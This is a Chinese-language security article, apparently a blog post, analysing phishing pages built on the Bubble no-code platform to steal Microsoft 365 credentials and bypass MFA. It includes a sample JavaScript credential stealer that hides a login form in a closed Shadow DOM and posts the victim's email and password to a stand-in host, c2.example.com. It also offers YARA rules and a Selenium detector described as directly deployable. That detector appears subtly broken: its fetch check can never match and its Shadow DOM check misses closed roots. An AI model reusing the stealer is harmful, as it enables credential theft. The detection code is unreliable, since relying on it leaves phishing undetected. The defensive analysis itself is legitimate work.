基于 Bubble AI 无代码平台的微软账号钓鱼攻击机理与防御研究

简介: 本文揭示AI无代码平台(如Bubble)正被滥用于构建高隐蔽钓鱼页面:利用Shadow DOM隔离、JS混淆及合法域名背书,绕过传统检测,窃取微软账号并绕过MFA。文章剖析攻击机理,提供YARA规则、DOM检测代码及覆盖平台治理、流量分析、终端防护、身份加固的闭环防御方案。(239字)

摘要

AI 驱动的无代码应用构建平台正成为网络钓鱼攻击的新型基础设施。2026 年 3 月安全研究显示,威胁组织利用 Bubble 可视化开发平台与 AI 生成能力,构造包含复杂 JavaScript 混淆、高密度 Shadow DOM 封装的恶意 Web 应用,实现对静态扫描与自动化检测机制的有效规避,定向实施微软账号凭证窃取攻击。该类钓鱼页面依托合法平台域名、动态代码生成、DOM 隔离封装三重特性,突破传统邮件网关、网页安全检测与终端防护体系,配合中间人攻击可进一步绕过双因素认证,对 Microsoft 365 等企业服务构成持续性威胁。本文以 Bubble 平台钓鱼样本为核心分析对象,系统阐述攻击全流程、前端混淆技术、凭证窃取逻辑与检测逃逸机理,给出可复现的检测代码、防御规则与配置方案,结合反网络钓鱼技术专家芦笛的专业观点,构建覆盖平台治理、流量检测、终端防护、身份安全的闭环防御体系,为企业与安全厂商应对无代码平台滥用型钓鱼提供技术参考与实践指引。

image.png 1 引言

无代码与低代码开发平台降低了 Web 应用构建门槛,同时也为网络攻击提供了轻量化、低成本、高隐蔽的武器化工具。攻击者无需掌握专业开发技能,通过可视化拖拽与 AI 辅助生成,即可快速产出高仿真度钓鱼页面,依托平台自带的正规域名、SSL 证书与 CDN 节点,显著提升攻击可信度与存活周期。

2026 年 3 月,Kaspersky 与 BleepingComputer 相继披露新型钓鱼活动:威胁组织滥用 Bubble AI 应用构建平台,批量生成伪装成微软登录入口的恶意 Web 应用,通过复杂 JavaScript 包与 Shadow DOM 结构规避自动化代码分析,窃取用户账号、密码乃至会话凭证,用于账户接管、数据窃取、横向渗透等后续攻击。此类攻击呈现三大特征:平台武器化、代码动态化、检测逃逸常态化,对现有安全体系形成结构性挑战。

反网络钓鱼技术专家芦笛指出,基于正规无代码平台的钓鱼攻击具备天然信任背书,代码结构高度混淆且每次生成存在变体,传统基于特征库、域名黑名单、URL 规则的检测方式失效概率极高,必须转向 DOM 结构解析、JavaScript 行为建模、上下文风险评分的新一代检测范式。

本文严格依据公开威胁情报与样本分析,完整还原攻击链路,深度拆解核心技术,提供可直接部署的检测代码与防御策略,形成机理分析 — 威胁建模 — 检测实现 — 防御落地的完整论证闭环,为应对同类威胁提供学术支撑与工程实践方案。

2 攻击背景与平台滥用现状

2.1 Bubble 平台特性与滥用入口

Bubble 是面向非开发人员的 AI 增强无代码 Web 应用搭建平台,支持可视化编辑、逻辑编排、自动生成前端代码,并提供应用托管、域名分配、CDN 加速等全链路服务。其被攻击者利用的核心优势如下:

合法域名背书:应用默认使用*.bubble.io子域名,具备正规 SSL 证书,易通过邮件网关与浏览器信任校验;

低门槛快速生成:依托 AI 生成器,攻击者可在数分钟内产出高仿真微软登录界面;

代码自动混淆:平台输出高度压缩、模块化、变量随机化的 JavaScript 代码,天然具备抗静态分析能力;

结构封装隔离:原生支持 Shadow DOM 组件化渲染,形成 DOM 隔离层,干扰常规代码扫描工具。

2.2 攻击目标与危害传导

攻击以微软个人账号与 Microsoft 365 企业账号为核心目标,覆盖员工、管理员、财务、人事等高价值对象。窃取凭证后可实现:

直接登录邮箱、OneDrive、SharePoint 等业务系统;

结合中间人攻击绕过双因素认证,获取长效会话令牌;

以内网合法身份实施横向移动、数据泄露、勒索部署等二次攻击;

为钓鱼即服务(PhaaS)平台提供标准化武器模块,降低黑产入行门槛。

反网络钓鱼技术专家芦笛强调,当正规无代码平台成为钓鱼 “兵工厂”,威胁将从零散个案演变为工业化、规模化、持续化的攻击浪潮,防御必须从单点拦截升级为全生命周期治理。

2.3 攻击整体生命周期

环境准备:注册 Bubble 账号,利用 AI 生成器描述微软登录页需求;

页面构造:可视化搭建表单界面,嵌入恶意 JS 与 Shadow DOM 封装逻辑;

代码优化:平台自动生成混淆代码,攻击者补充数据上传、跳转逻辑;

分发引流:通过邮件、即时通讯、社交平台发送含bubble.io域名的钓鱼链接;

检测逃逸:利用复杂 JS 与 Shadow DOM 绕过静态 / 自动化分析;

凭证窃取:用户输入账号密码,数据经加密后回传攻击者服务器;

账号利用:登录目标账号,结合 AiTM 绕过 MFA,实施数据窃取与内网渗透。

3 攻击核心技术机理分析

3.1 基于 Shadow DOM 的检测逃逸

Shadow DOM 作为 Web Components 标准的核心组件,可创建独立于主文档的隔离 DOM 子树,实现样式、结构与脚本的封装隔离。攻击者利用该特性构造 “黑盒页面”,使常规扫描工具无法获取真实表单与恶意逻辑。

关键技术点:

封闭模式(closed mode):外部 JS 无法访问 Shadow Root 内部结构,阻止 DOM 遍历检测;

深层嵌套:多层 Shadow DOM 嵌套,提升分析复杂度;

动态挂载:运行时动态创建 Shadow Tree,规避静态爬取。

反网络钓鱼技术专家芦笛指出,Shadow DOM 本身是合法技术,但被恶意用于阻断代码可见性时,即成为钓鱼攻击的 “隐身衣”,安全工具必须具备 Shadow DOM 穿透解析能力。

3.2 复杂 JavaScript 混淆与动态生成

Bubble 平台输出的 JS 具备多重混淆特性:

变量随机化:使用长随机字符串命名函数与变量,消除语义特征;

代码分片:逻辑分散在多个模块,通过异步加载串联执行;

垃圾代码注入:插入无意义计算与分支,干扰代码理解;

运行时解码:核心逻辑加密存储,执行时动态解密还原。

此类结构即使对安全专家也存在分析门槛,自动化算法更易判定为正常业务页面。

3.3 凭证窃取与数据回传实现

钓鱼页面通过表单获取用户输入,经 Base64、AES 等编码后发送至攻击者控制的服务器,关键流程:

监听表单提交事件,阻止默认跳转;

提取用户名、密码等字段;

数据编码 / 加密,隐藏传输特征;

异步发送至 C2 服务器;

伪造跳转至微软官网,消除用户怀疑。

3.4 与中间人攻击结合绕过 MFA

获取明文密码后,攻击系统自动发起真实微软登录流程,将 MFA 验证请求实时转发给受害者。用户完成验证后,攻击者获取有效会话令牌,实现长效账户控制。

反网络钓鱼技术专家芦笛强调,传统 MFA 无法抵御 AiTM 型钓鱼,必须配合 FIDO2 硬件密钥、风险自适应认证、会话绑定等机制才能有效防御。

4 关键代码示例与检测特征

4.1 恶意 Shadow DOM 封装核心代码

// 封闭模式Shadow DOM,外部无法访问

const shadowHost = document.createElement('div');

const shadowRoot = shadowHost.attachShadow({ mode: 'closed' });

document.body.appendChild(shadowHost);


// 动态构造微软登录表单

const formHTML = `

 <div id="login-form">

   <input type="text" id="email" placeholder="邮箱">

   <input type="password" id="pass" placeholder="密码">

   <button onclick="stealCredential()">登录</button>

 </div>

`;

shadowRoot.innerHTML = formHTML;


// 凭证窃取函数

function stealCredential() {

 const email = shadowRoot.getElementById('email').value;

 const password = shadowRoot.getElementById('pass').value;

 const data = btoa(JSON.stringify({ email, password }));

 // 回传攻击者服务器

 fetch('https://c2.example.com/collect', {

   method: 'POST',

   body: data

 });

 // 伪造跳转

 window.location.href = 'https://login.microsoftonline.com';

}

4.2 混淆 JavaScript 检测特征

// 典型混淆特征:随机变量、垃圾代码、动态执行

const _0x1a9b = function() {

 const _0x2b8c = ['abc123', 'replace', 'log', 'fromCharCode'];

 _0x1a9b = function() { return _0x2b8c; };

 return _0x1a9b();

};

// 特征:长随机命名、空循环、字符串编码

4.3 YARA 检测规则

plaintext

rule Bubble_Microsoft_Phishing_ShadowDOM {

   meta:

       description = "检测Bubble平台微软钓鱼Shadow DOM特征"

   strings:

       $shadow_closed = "attachShadow({ mode: 'closed' })"

       $login_microsoft = "login.microsoft"

       $bubble_io = "bubble.io"

       $steal_fetch = "fetch("

   condition:

       2 of them

}


rule Bubble_Obfuscated_JS {

   meta:

       description = "检测Bubble平台钓鱼混淆JS"

   strings:

       $long_var = /_[a-f0-9]{4,}/

       $garbage = /while\(0\)|for\(;;\)/

       $btoa_data = "btoa(JSON.stringify"

   condition:

       2 of them

}

4.4 Python 动态检测代码(DOM 解析)

from selenium import webdriver

from selenium.webdriver.common.by import By

import re


def check_shadow_phishing(url):

   options = webdriver.ChromeOptions()

   options.add_argument("--headless")

   driver = webdriver.Chrome(options=options)

   driver.get(url)

   # 检测封闭Shadow DOM

   shadow_js = """

   return document.querySelector('*[shadowroot]') !== null ||

          document.querySelector('div').shadowRoot !== null

   """

   has_shadow = driver.execute_script(shadow_js)

   # 检测微软登录关键词

   page_text = driver.find_element(By.TAG_NAME, 'body').text

   has_ms = re.search(r'microsoft|outlook|office365', page_text, re.I)

   # 检测数据上传

   has_fetch = driver.execute_script("return !!window.fetch.toString().match(/collect|send|post/i)")

   driver.quit()

   return has_shadow and has_ms and has_fetch


# 调用示例

# result = check_shadow_phishing("https://xxx.bubble.io")

5 攻击威胁模型与安全缺陷分析

5.1 信任链滥用

平台域名合法、SSL 有效、CDN 节点可信,突破邮件网关与终端信誉检测;

用户对正规域名警惕性低,社会工程成功率显著提升。

5.2 检测机制失效

静态扫描无法解析 Shadow DOM 与混淆 JS;

自动化工具误判为正常业务应用;

代码每次生成存在变体,特征库难以覆盖。

5.3 身份体系脆弱性

密码 + MFA 组合无法抵御 AiTM 攻击;

企业缺乏会话风险监控与异常登录阻断机制;

员工对仿冒登录界面识别能力不足。

反网络钓鱼技术专家芦笛强调,此类攻击击穿了 “域名信任 + 特征检测 + MFA” 三重传统防线,暴露了当前安全体系对无代码平台滥用、前端混淆、DOM 隔离等新型手段的应对短板。

6 全维度防御体系构建

6.1 平台侧治理

建立应用上架审核机制,强化登录类页面人工抽检;

对表单、数据上传、跳转行为进行风险识别与限流;

联动安全厂商共享恶意应用样本与域名黑名单。

6.2 网络与邮件防护

部署支持 Shadow DOM 解析与 JS 行为分析的 Web 网关;

对bubble.io等易滥用平台域名实施链接沙箱与风险提示;

启用 SPF/DKIM/DMARC,降低伪造邮件成功率。

6.3 终端与应用安全

浏览器扩展拦截高风险 Shadow DOM 页面;

终端 EDR 监控异常数据上传与敏感表单操作;

禁用高风险 JS 执行策略,限制不明页面异步上传。

6.4 身份认证强化

推广 FIDO2 硬件安全密钥,抵御 AiTM 攻击;

启用 Microsoft Entra ID 条件访问,限制异常地点、设备登录;

对管理员账号启用会话超时、登录通知、风险阻断。

6.5 检测与运营闭环

建立无代码平台钓鱼威胁情报库,实时更新规则;

开展常态化钓鱼演练,提升员工识别能力;

构建 7×24 小时监测响应机制,快速下架恶意应用。

反网络钓鱼技术专家芦笛强调,防御无代码平台钓鱼必须坚持平台治理 + 流量检测 + 终端防护 + 身份加固四元协同,任何单一方案均无法形成有效闭环。

7 趋势研判与归因说明

现有情报未将该类攻击归因于国家级组织,更符合机会主义网络犯罪与 PhaaS 平台特征。未来趋势:

更多无代码平台将被武器化,攻击门槛持续降低;

AI 生成代码混淆度更高,变体更快,检测难度持续上升;

与 AiTM、设备码钓鱼、OAuth 盗用结合,形成组合攻击;

攻击目标从个人账号转向企业管理员、核心业务系统等高价值对象。

反网络钓鱼技术专家芦笛指出,无代码平台滥用将成为未来 3—5 年钓鱼攻击主流形态,安全行业需加快研发前端深度解析、代码行为建模、上下文风险评估等核心能力。

8 结论

AI 无代码平台为网络钓鱼提供了轻量化、高隐蔽、低成本的新型能力,基于 Bubble 的微软账号钓鱼攻击通过 Shadow DOM 隔离、JavaScript 混淆、正规域名背书三重手段,实现对传统检测体系的系统性逃逸,配合中间人攻击可绕过 MFA,对企业身份安全构成严重威胁。

本文完整还原攻击流程,深度解析前端逃逸、凭证窃取、检测绕过等关键技术,提供可直接部署的检测代码、YARA 规则与防御配置,构建覆盖平台、网络、终端、身份的闭环防御体系。研究表明,通过平台治理、深度检测、强认证、运营闭环协同,可有效降低此类威胁危害。

后续研究将聚焦多平台滥用对比、AI 生成代码溯源、实时 DOM 行为检测等方向,为应对工业化、武器化、智能化钓鱼攻击提供持续技术支撑。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
10天前
|
机器学习/深度学习 人工智能 数据挖掘
三个百万token窗口语义学分析之三:“熔炉法” ——RAG与知识图谱的融合构建
本研究为百万token窗口语义学分析系列的第三篇。在“垂钓法”(主观预设)和“撒网法”(客观挖掘)的基础上,提出“熔炉法”——将RAG向量检索与知识图谱融合,构建可查询、可推理的项目知识基础设施。基于三个窗口的8,086轮对话,我们构建了FAISS向量索引和包含200个概念节点、19,701条关系边的知识图谱。实验表明,熔炉法能够同时检索相关对话片段和概念关系,支持跨窗口问答,并为“主观向量注入”预留了接口。熔炉法完成了从“主观预设”到“客观挖掘”再到“主客观统一”的方法论闭环,为项目知识管理和跨窗口迁移奠定了可扩展的基础。
|
24天前
|
传感器 机器学习/深度学习 存储
AI 智能体开发全流程
AI智能体开发已成系统工程:从角色定义、工具集成、Prompt调优,到自动化评估与持续进化,涵盖规划、记忆、工具调用全链路。告别简单“调包”,迈向可信赖、可演进的自主智能。(239字)
|
24天前
|
存储 人工智能 关系型数据库
OpenClaw怎么可能没痛点?用RDS插件来释放OpenClaw全部潜力
OpenClaw插件是深度介入Agent生命周期的扩展机制,提供24个钩子,支持自动注入知识、持久化记忆等被动式干预。相比Skill/Tool,插件可主动在关键节点(如对话开始/结束)执行逻辑,适用于RAG增强、云化记忆等高级场景。
777 56
OpenClaw怎么可能没痛点?用RDS插件来释放OpenClaw全部潜力
|
9天前
|
人工智能 Linux API
OpenClaw多Agent协作系统实操:本地+阿里云部署与千问/Coding Plan API配置全指南
2026年OpenClaw(原Clawdbot)推出的多Agent协作系统,彻底打破了单一AI智能体的能力边界,让多个AI Agent像人类团队一样实现智能分工、实时信息同步与灵活角色配置,可高效完成内容创作、软件开发、数据分析等复杂复合型任务。在实际落地过程中,开发者不仅需要掌握多Agent协作系统的基础使用逻辑,更需要完成OpenClaw在本地多系统(MacOS/Linux/Windows11)与阿里云的稳定部署,同时实现与阿里云千问大模型API、免费Coding Plan API的无缝对接,才能真正发挥多Agent协作的核心价值。本文将深度解析OpenClaw多Agent协作系统的核心
765 10
|
7天前
|
Web App开发 安全 数据挖掘
TA446 组织利用 DarkSword 漏洞套件针对 iOS 的定向钓鱼攻击研究
2026年3月,俄APT组织TA446利用泄露的DarkSword iOS漏洞套件,通过伪造大西洋理事会邮件实施定向钓鱼攻击。该攻击依托PAC绕过、内核提权等0day链,实现无文件、低交互的Safari远程入侵,窃取iCloud凭证、钥匙串等敏感数据,并部署GHOSTBLADE与MAYBEROBOT载荷。研究表明,国家级漏洞工具公开化正加速高端移动威胁平民化,亟需构建终端加固、流量检测与行为监控相结合的纵深防御体系。(239字)
161 7
|
25天前
|
Arthas 人工智能 Java
我们做了比你更懂 Java 的 AI-Agent -- Arthas Agent
Arthas Agent 是基于阿里开源Java诊断工具Arthas的AI智能助手,支持自然语言提问,自动匹配排障技能、生成安全可控命令、循证推进并输出结构化报告,大幅降低线上问题定位门槛。
753 64
我们做了比你更懂 Java 的 AI-Agent -- Arthas Agent
|
2天前
|
Python Windows
Python 3.14 安装教程:详细步骤+自定义路径+环境变量配置(64位)
Python是简单易学、开源免费的面向对象编程语言。本文详解Python 3.14在64位Windows系统的安装全流程:下载解压、管理员运行、配置PATH与安装路径、创建IDLE桌面快捷方式,并通过启动交互界面验证安装成功。(239字)
|
9天前
|
人工智能 自然语言处理 机器人
零基础保姆级图文教程|阿里云计算巢部署OpenClaw(Clawdbot) 钉钉集成+大模型配置全流程
2026年,AI自动化框架OpenClaw(原Clawdbot)凭借阿里云计算巢一键部署、云端稳定运行与钉钉深度集成能力,成为企业与个人打造AI办公助手的核心工具。计算巢提供官方认证的OpenClaw部署模板,无需手动配置环境,5分钟即可完成云端部署;搭配阿里云千问大模型、免费Coding Plan API,再通过钉钉渠道实现群聊/私聊指令交互、任务自动执行、结果实时推送,满足办公效率提升、团队协作、轻量业务自动化等场景需求。
817 5
|
26天前
|
机器学习/深度学习 人工智能 运维
税务欺诈“十二大骗局”的数字化演进与智能防御体系构建
本文剖析IRS 2026年“十二大骗局”,揭示AI驱动的税务欺诈新形态——利用生成式AI伪造文件、深度伪造冒充官员、自动化批量申报等。提出“数据驱动—行为画像—动态阻断”智能防御框架,融合孤立森林与图算法实现事前预警与事中拦截,为税务机关提供可落地的技术反制方案。(239字)
144 16

热门文章

最新文章